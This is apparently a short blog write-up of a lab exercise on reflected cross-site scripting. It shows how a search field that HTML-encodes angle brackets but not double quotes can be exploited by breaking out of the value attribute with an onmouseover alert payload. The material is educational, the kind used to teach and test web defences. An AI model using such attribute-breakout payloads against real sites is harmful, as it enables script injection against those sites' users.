Reflected XSS with HTML-encoded angle brackets (<,>)

Input is directly reflected into the HTML request, where angle brackets are HTML-encoded but the input is not properly escaped

Maning

~2 min read · April 27, 2026 (Updated: April 27, 2026) · Free: Yes

Reflected XSS occurs when the payload is included and executed through the HTTP request itself and reflected in the response

For this lab activity, the search bar is vulnerable to XSS where angle brackets (<,>) are HTML-encoded, meaning special characters are converted into safe text so the browser does not interpret them as code

Let's try the basic payload we used in the previous lab

<script>alert()</script>

As you can see, the payload is displayed as plain text, so let's inspect the website's source code "ctrl + u"

<section class=blog-header>
    <h1>0 search results for '<script>alert()</script>'</h1>
    <hr>
</section>
<section class=search>
    <form action=/ method=GET>
        <input type=text placeholder='Search the blog...' name=search value="<script>alert()</script>">
        <button type=submit class=button>Search</button>
    </form>

The angle brackets are being HTML-encoded into < = "<" and > = ">"

So our input is being reflected but displayed as plain text rather than being interpreted as HTML code

This means that payloads using angle brackets will be treated as plain text and will not execute successfully

Let's try using another payload

"onmouseover="alert(1)

So why did this payload work? Let's inspect the source code again

<section class=blog-header>
    <h1>0 search results for '"onmouseover="alert(1)'</h1>
    <hr>
</section>
<section class=search>
    <form action=/ method=GET>
        <input type=text placeholder='Search the blog...' name=search value=""onmouseover="alert(1)">
        <button type=submit class=button>Search</button>
    </form>

Our input is reflected on the value = "USER INPUT"

So the browser takes our input in like this

value=""onmouseover="alert(1)"

The search parameter does not properly escape the double quotes (" ")

So what happens is

value=" "

It breaks out of the attribute "value" early

onmouseover="alert(1)"

Then creates a new event handler

The alert happens when you hover the mouse over the search bar

In this lab, the search input is reflected inside an HTML attribute, and while angle brackets are HTML-encoded, double quotes are not properly escaped. This allows an attacker to break out of the "value" attribute using a quote and inject a new attribute onmouseover="alert(1)". The browser then interprets this injected code as part of the element, so when the user hovers over with the search bar, the event handler executes and triggers the JavaScript, triggering an alert

#xss-attack #reflected-xss

< Go to the original

Reflected XSS with HTML-encoded angle brackets (<,>)

Input is directly reflected into the HTML request, where angle brackets are HTML-encoded but the input is not properly escaped

Reporting a Problem